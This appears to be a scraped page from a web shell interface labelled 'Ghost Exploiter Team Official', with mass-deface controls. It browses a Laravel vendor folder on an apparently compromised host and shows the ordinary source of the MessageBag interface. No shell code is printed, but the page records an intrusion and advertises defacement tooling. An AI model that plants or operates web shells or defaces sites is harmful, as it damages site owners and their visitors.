webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
whitjouh
/
public_html
/
core
/
vendor
/
laravel
/
framework
/
src
/
Illuminate
/
Contracts
/
Support
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
Arrayable.php
0.251KB
edt
ren
CanBeEscapedWhenCastToS
...
0.321KB
edt
ren
DeferrableProvider.php
0.202KB
edt
ren
DeferringDisplayableVal
...
0.278KB
edt
ren
Htmlable.php
0.182KB
edt
ren
Jsonable.php
0.235KB
edt
ren
MessageBag.php
2.182KB
edt
ren
MessageProvider.php
0.23KB
edt
ren
Renderable.php
0.192KB
edt
ren
Responsable.php
0.299KB
edt
ren
ValidatedData.php
0.17KB
edt
ren
<?php namespace Illuminate\Contracts\Support; use Countable; interface MessageBag extends Arrayable, Countable { /** * Get the keys present in the message bag. * * @return array */ public function keys(); /** * Add a message to the bag. * * @param string $key * @param string $message * @return $this */ public function add($key, $message); /** * Merge a new array of messages into the bag. * * @param \Illuminate\Contracts\Support\MessageProvider|array $messages * @return $this */ public function merge($messages); /** * Determine if messages exist for a given key. * * @param string|array $key * @return bool */ public function has($key); /** * Get the first message from the bag for a given key. * * @param string|null $key * @param string|null $format * @return string */ public function first($key = null, $format = null); /** * Get all of the messages from the bag for a given key. * * @param string $key * @param string|null $format * @return array */ public function get($key, $format = null); /** * Get all of the messages for every key in the bag. * * @param string|null $format * @return array */ public function all($format = null); /** * Remove a message from the bag. * * @param string $key * @return $this */ public function forget($key); /** * Get the raw messages in the container. * * @return array */ public function getMessages(); /** * Get the default message format. * * @return string */ public function getFormat(); /** * Set the default message format. * * @param string $format * @return $this */ public function setFormat($format = ':message'); /** * Determine if the message bag has any messages. * * @return bool */ public function isEmpty(); /** * Determine if the message bag has any messages. * * @return bool */ public function isNotEmpty(); }
<=Back
Liking